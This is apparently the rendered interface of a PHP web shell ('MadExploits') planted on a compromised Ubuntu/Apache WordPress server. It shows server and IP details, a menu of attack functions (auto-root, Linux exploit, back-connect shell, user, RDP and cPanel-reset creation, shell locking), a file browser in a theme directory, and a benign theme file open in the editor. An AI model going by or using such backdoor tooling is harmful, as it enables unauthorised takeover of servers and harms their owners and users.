Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
owc /
wp-content /
themes /
eduma-old /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-x--x
data
[ DIR ]
drwxr-x--x
header
[ DIR ]
drwxr-x--x
libs
[ DIR ]
drwxr-x--x
templates
[ DIR ]
drwxr-x--x
widgets
[ DIR ]
drwxr-x--x
custom-functions.php
76.83
KB
-rwxr-x--x
learnpress-functions.php
50.23
KB
-rwxr-x--x
learnpress-v3-functions.php
33.8
KB
-rwxr-x--x
learnpress-v4-functions.php
27.59
KB
-rwxr-x--x
lp-course_offline.php
20.35
KB
-rwxr-x--x
register-functions.php
18.83
KB
-rwxr-x--x
related.php
1.61
KB
-rwxr-x--x
tax-meta.php
3.41
KB
-rwxr-x--x
template-tags.php
13.76
KB
-rwxr-x--x
thim-core-function.php
10.39
KB
-rwxr-x--x
upgrade.php
17.23
KB
-rwxr-x--x
wrapper-before-after.php
6.99
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : related.php
<?php // Get Related Portfolio by Category if ( get_theme_mod( 'thim_archive_single_related_post', true ) == false ) { return; } $number_related = apply_filters( 'thim_related_posts', 3 ); $related = thim_get_related_posts( get_the_ID(), $number_related ); if ( $related->have_posts() ) { ?> <section class="related-archive"> <h3 class="single-title"><?php esc_html_e( 'You may also like', 'eduma' ); ?></h3> <?php echo '<div class="archived-posts">'; echo '<div class="thim-carousel-wrapper" data-visible="3" data-itemtablet="2" data-itemmobile="1" data-pagination="1">'; while ( $related->have_posts() ) { $related->the_post(); ?> <div <?php post_class(); ?>> <div class="category-posts clear"> <?php if ( has_post_thumbnail() ) { $class = ''; ?> <a href="<?php echo esc_url( get_the_permalink() ); ?>" title="<?php echo esc_attr( get_the_title() ); ?>"><?php echo thim_get_feature_image( get_post_thumbnail_id(), 'full', '300', '200' ); ?></a> <?php } else { $class = 'no-images'; } ?> <div class="rel-post-text"> <?php echo sprintf( '<h5 class="title-related '.esc_attr( $class ).'"><a href="%s" rel="bookmark">%s</a></h5>', esc_url( get_the_permalink() ), esc_attr( get_the_title() ) );?> <div class="date"> <?php echo get_the_date( 'j F, Y' ); ?> </div> </div> <?php if ( $class == 'no-images' ) { ?> <div class="des-related"> <?php the_excerpt(); ?> </div> <?php } ?> </div> </div> <?php } wp_reset_postdata(); echo '</div>'; echo '</div>'; ?> </section><!--.related--> <?php }
Close